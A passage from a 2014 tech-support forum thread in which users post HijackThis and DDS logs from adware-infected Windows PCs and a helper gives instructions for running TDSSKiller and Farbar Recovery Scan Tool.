PNP Device ID: PCI\VEN_168C&DEV_001C&SUBSYS_7128144F&REV_01\4&C8C337F&0&00E1
Service: athr
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
64 Bit HP CIO Components Installer
7-Zip 9.20 (x64 edition)
Adobe Flash Player 13 ActiveX
Adobe Flash Player 14 Plugin
Adobe Reader X (10.1.10)
AIO_CDB_ProductContext
AIO_CDB_Software
AIO_CDB_ToolboxIni64
AIO_Scan
Atheros Driver Installation Program
BufferChm
CD/DVD Drive Acoustic Silencer
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
Copy
CVE-2012-4792
Destinations
DeviceManagementQFolder
DocProc
DocProcQFolder
DVD MovieFactory for TOSHIBA
ESET Online Scanner v3
eSupportQFolder
F300
F300_Help
F300Trb
Fax
Ghostery IE Plugin
Google Update Helper
HD Tune Pro 5.00
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
HP Imaging Device Functions 8.0
HP OCR Software 8.0
HP Photosmart Essential
HP Photosmart, Officejet, PSC and Deskjet All-In-One Driver Software 8.0.B
HP Solution Center 8.0
HPProductAssistant
Intel(R) Graphics Media Accelerator Driver
Intel® Matrix Storage Manager
Java 7 Update 55
Java Auto Updater
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4.5.1
Microsoft Office 2000 SR-1 Professional
Microsoft Security Client
Microsoft Security Essentials
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft XML Parser
Mozilla Firefox 30.0 (x86 en-US)
Mozilla Maintenance Service
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
QuickBooks Financial Center
Realtek 8169 8168 8101E 8102E Ethernet Driver
Realtek High Definition Audio Driver
Realtek USB 2.0 Card Reader
SAMSUNG Intelli-studio
Scan
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Windows Media Encoder (KB2447961)
SolutionCenter
Status
SUPERAntiSpyware
swMSM
Synaptics Pointing Device Driver
Toolbox
TOSHIBA Assist
TOSHIBA Desktop Links
TOSHIBA Disc Creator
TOSHIBA DVD PLAYER
TOSHIBA Extended Tiles for Windows Mobility Center
TOSHIBA Hardware Setup
TOSHIBA Recovery Disc Creator
TOSHIBA Service Station
TOSHIBA Software Modem
TOSHIBA Supervisor Password
TOSHIBA Value Added Package
TrayApp
UnloadSupport
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
WebReg
Windows Driver Package - TOSHIBA (FwLnk) System (11/19/2006 1.0.0.3)
Windows Media Encoder 9 Series
.
==== End Of File ===========================

GMER would not run or let me uncheck the IAT/EAT box as it closed as sson as I acknowledged it could not run.

I am writing this for a friend because he can't even get his computer to function well enough to do this. It is running very slowly and opening tons of pages asking him to download security things or software updates that seem to be bogus. I took a quick peek and it looks like he has a lot of malware going on. He was able to get a HJT log and the two dds, but the third one for the root kit, he was never able to complete. I will try to help him do that in the morning and send it then. Here are the logs he was able to get.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:24:29 PM, on 6/24/2014
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18385)
Boot mode: Normal

Running processes:
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis.exe

O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 1002 bytes

Does that look like it could be all of the HJT log? seems like it should have been longer?

here are the two dds.

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6001.18385
Run by Owner at 15:31:47 on 2014-06-24
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Highlightly\Service\hlsvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\system32\mcbuilder.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Users\Owner\Downloads\HijackThis.exe
C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\consent.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.inbox.com/homepage.aspx?tbid=82047&lng=en
uSearch Bar = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=aus&qkw=%s&tbid=%tb_id&%language
uURLSearchHooks: {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - <orphaned>
uURLSearchHooks: YTNavAssistPlugin Class: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: &Yahoo! Toolbar Helper: {02478D38-C3F9-4efb-9B51-7695ECA05670} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: Consumer Input DCA BHO: {B49699FC-1665-4414-A1CB-C4A2A4A13EEC} - c:\program files\consumer input\internetexplorer\dca-bho.dll
TB: Yahoo! Toolbar: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [InstallX Search Protect for Yahoo] "c:\users\owner\appdata\roaming\installx search protect for yahoo\searchprotector.exe"
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{61564412-C2C4-4DFA-8A8A-D2F3F4090F46} : DHCPNameServer = 192.168.1.254
Notify: igfxcui - igfxdev.dll
AppInit_DLLs=
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\33.0.1750.146\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R? consumerinput_updatem;ConsumerInput Update Service (consumerinput_updatem)
S? consumerinput_update;ConsumerInput Update Service (consumerinput_update)
S? hlnfd;hlnfd
S? hlsvc;Highlightly Client Service
S? MpFilter;Microsoft Malware Protection Driver
S? SSPORT;SSPORT
.
=============== File Associations ===============
.
FileExt: .exe: exefile=%1" %*
.
=============== Created Last 30 ================
.
2014-06-24 18:12:19 -------- d-----w- C:\PerfLogs
2014-06-24 18:00:00 -------- d-----w- C:\e68a0837cbe68956e898c72406bd1d
2014-06-24 14:49:10 -------- d-----w- c:\program files\easyoToShop
2014-06-23 16:16:10 -------- d-----w- C:\377e6bbe4c1bb407f10663d9eac049c5
2014-06-23 16:03:02 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{687c3d5d-996c-43fc-a842-747754aad8b8}\mpengine.dll
2014-06-23 15:46:13 -------- d-----w- C:\c3c7401f36417f6799366670
2014-06-20 15:18:52 -------- d-----w- C:\204bf2db0fe5fe5e2c
2014-06-20 15:04:46 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2014-06-13 16:56:46 -------- d-----w- C:\d71c225c8b6743ad084f865e3855fdba
2014-06-05 12:14:50 -------- d-----w- C:\ce9efcad6324db144db301d0fd2230
.
==================== Find3M ====================
.
2014-06-24 17:05:23 101888 ----a-w- c:\windows\system32\ifxcardm.dll
2014-06-24 17:04:28 82432 ----a-w- c:\windows\system32\axaltocm.dll
.
============= FINISH: 15:47:43.83 ===============


.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume1
Install Date: 5/18/2012 2:21:54 PM
System Uptime: 6/24/2014 2:18:24 PM (1 hours ago)
.
Motherboard: ACER | | EG31M
Processor: Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz | CPU 1 | 2200/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 75 GiB total, 56.959 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e96f-e325-11ce-bfc1-08002be10318}
Description: Microsoft PS/2 Mouse
Device ID: ACPI\PNP0F03\4&19BC08A1&0
Manufacturer: Microsoft
Name: Microsoft PS/2 Mouse
PNP Device ID: ACPI\PNP0F03\4&19BC08A1&0
Service: i8042prt
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
Adobe Flash Player 11 ActiveX
Adobe Reader XI (11.0.07)
Aff Packages
CCleaner
Consumer Input
Consumer Input (remove only)
Google Chrome
Google Update Helper
Highlightly
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)

As i said i will try to get the 3rd log sent in the morning. Thank you in advance for your help.

Hi and welcome.

Please download the latest version of TDSSKiller from here and save it to your Desktop.

• Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.

• Then click on Change parameters in TDSSKiller.

• Another window will appear.

• Check all boxes then click OK.

• Click the Start Scan button.

• The scan should take no longer than 2 minutes.

• If a suspicious object is detected, the default action will be Skip, click on Continue.

• If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.

Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.

• A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Double-click to run it. When the tool opens click Yes to disclaimer.
• Make sure that under Optional Scans, there is a checkmark on Addition.txt and Shortcut.
• Press Scan button.
• It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
• The first time the tool is run, it makes also another two logs (Addition.txt and Shortcut.txt). Please attach these to your reply.

Hi, I am writing this for a friend as his computer is in such bad shape that it took us almost 3 hours just to get the logs ran. I still couldn't get the 3rd one done. His computer is running very slowly and sounds like it is running constanly in the background. Pages keep opening asking him to download security stuff and other software updates. In addition to this, some how or another the only program that the computer will try to use to open files is Adobe Reader. Any way here are the logs that we were able to run. I will try to get the 3rd one (the one that starts with a 'g' ) in the morning.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:24:29 PM, on 6/24/2014
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18385)
Boot mode: Normal

Running processes:
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Users\Owner\Downloads\HijackThis.exe

O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 1002 bytes

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6001.18385
Run by Owner at 15:31:47 on 2014-06-24
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Highlightly\Service\hlsvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Consumer Input\Monitoring\dca-monitoring.exe
C:\Program Files\Consumer Input\Update\ConsumerInputUpdate.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Owner\AppData\Roaming\InstallX Search Protect for Yahoo\searchprotector.exe
C:\Windows\system32\mcbuilder.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\System32\wsqmcons.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Users\Owner\Downloads\HijackThis.exe
C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\consent.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.inbox.com/homepage.aspx?tbid=82047&lng=en
uSearch Bar = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=aus&qkw=%s&tbid=%tb_id&%language
uURLSearchHooks: {D3D233D5-9F6D-436C-B6C7-E63F77503B30} - <orphaned>
uURLSearchHooks: YTNavAssistPlugin Class: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: &Yahoo! Toolbar Helper: {02478D38-C3F9-4efb-9B51-7695ECA05670} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
BHO: Consumer Input DCA BHO: {B49699FC-1665-4414-A1CB-C4A2A4A13EEC} - c:\program files\consumer input\internetexplorer\dca-bho.dll
TB: Yahoo! Toolbar: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - c:\program files\yahoo!\companion\installs\cpn1\yt.dll
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [InstallX Search Protect for Yahoo] "c:\users\owner\appdata\roaming\installx search protect for yahoo\searchprotector.exe"
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{61564412-C2C4-4DFA-8A8A-D2F3F4090F46} : DHCPNameServer = 192.168.1.254
Notify: igfxcui - igfxdev.dll
AppInit_DLLs=
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\33.0.1750.146\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R? consumerinput_updatem;ConsumerInput Update Service (consumerinput_updatem)
S? consumerinput_update;ConsumerInput Update Service (consumerinput_update)
S? hlnfd;hlnfd
S? hlsvc;Highlightly Client Service
S? MpFilter;Microsoft Malware Protection Driver
S? SSPORT;SSPORT
.
=============== File Associations ===============
.
FileExt: .exe: exefile=%1" %*
.
=============== Created Last 30 ================
.
2014-06-24 18:12:19 -------- d-----w- C:\PerfLogs
2014-06-24 18:00:00 -------- d-----w- C:\e68a0837cbe68956e898c72406bd1d
2014-06-24 14:49:10 -------- d-----w- c:\program files\easyoToShop
2014-06-23 16:16:10 -------- d-----w- C:\377e6bbe4c1bb407f10663d9eac049c5
2014-06-23 16:03:02 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{687c3d5d-996c-43fc-a842-747754aad8b8}\mpengine.dll
2014-06-23 15:46:13 -------- d-----w- C:\c3c7401f36417f6799366670
2014-06-20 15:18:52 -------- d-----w- C:\204bf2db0fe5fe5e2c
2014-06-20 15:04:46 8140904 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2014-06-13 16:56:46 -------- d-----w- C:\d71c225c8b6743ad084f865e3855fdba
2014-06-05 12:14:50 -------- d-----w- C:\ce9efcad6324db144db301d0fd2230
.
==================== Find3M ====================
.
2014-06-24 17:05:23 101888 ----a-w- c:\windows\system32\ifxcardm.dll
2014-06-24 17:04:28 82432 ----a-w- c:\windows\system32\axaltocm.dll
.
============= FINISH: 15:47:43.83 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume1
Install Date: 5/18/2012 2:21:54 PM
System Uptime: 6/24/2014 2:18:24 PM (1 hours ago)
.
Motherboard: ACER | | EG31M
Processor: Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz | CPU 1 | 2200/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 75 GiB total, 56.959 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e96f-e325-11ce-bfc1-08002be10318}
Description: Microsoft PS/2 Mouse
Device ID: ACPI\PNP0F03\4&19BC08A1&0
Manufacturer: Microsoft
Name: Microsoft PS/2 Mouse
PNP Device ID: ACPI\PNP0F03\4&19BC08A1&0
Service: i8042prt
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
Adobe Flash Player 11 ActiveX
Adobe Reader XI (11.0.07)
Aff Packages
CCleaner
Consumer Input
Consumer Input (remove only)
Google Chrome
Google Update Helper
Highlightly
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Intel(R) Graphics Media Accelerator Driver
MCE Software Encoder 1.1
Microsoft .NET Framework 3.5 SP1
Microsoft Security Client
Microsoft Security Essentials
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
PE585QA-32
Software Updater version 1.8.3
Type 101
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Windows Driver Package - Conexant (cxpl_mhd) Media (11/07/2007 6.0.104.0038)
Yahoo! Toolbar
.
==== End Of File ===========================

Thank you in advance for any help. The man that owns this computer is 80 years young!

My internet usage has spiked dramatically. It seems to decrease when I have my laptop off and am only using streaming devices. I've ran my Kaspresky antivirus and MS bot tool but they didn't find anything. Any help would be appreciated!!


Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 7 Home Premium, Service Pack 1, 64 bit
Processor: Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz, Intel64 Family 6 Model 42 Stepping 7
Processor Count: 8
RAM: 8172 Mb
Graphics Card: AMD Radeon HD 6550M, 1024 Mb
Hard Drives: C: Total - 430419 MB, Free - 56456 MB; D: Total - 31208 MB, Free - 28287 MB;
Motherboard: LENOVO, KL2
Antivirus: Kaspersky PURE 3.0, Updated and Enabled


Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 8:00:26 PM, on 6/24/2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17126)
Boot mode: Normal

Running processes:
C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\Users\tk\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Safe Money Plugin - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\OnlineBanking\online_banking_bho.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [MuteSync] C:\PROGRA~2\Lenovo\LENOVO~1\MuteSync.exe
O4 - HKLM\..\Run: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
O4 - HKLM\..\Run: [Lenovo SlideNav2] "C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe"
O4 - HKLM\..\Run: [AVP] "C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe"
O4 - HKLM\..\Run: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
O4 - HKLM\..\Run: [YouCam Mirage] "C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe"
O4 - HKLM\..\Run: [YouCam Tray] "C:\Program Files (x86)\Lenovo\YouCam\YouCam.exe" /s
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
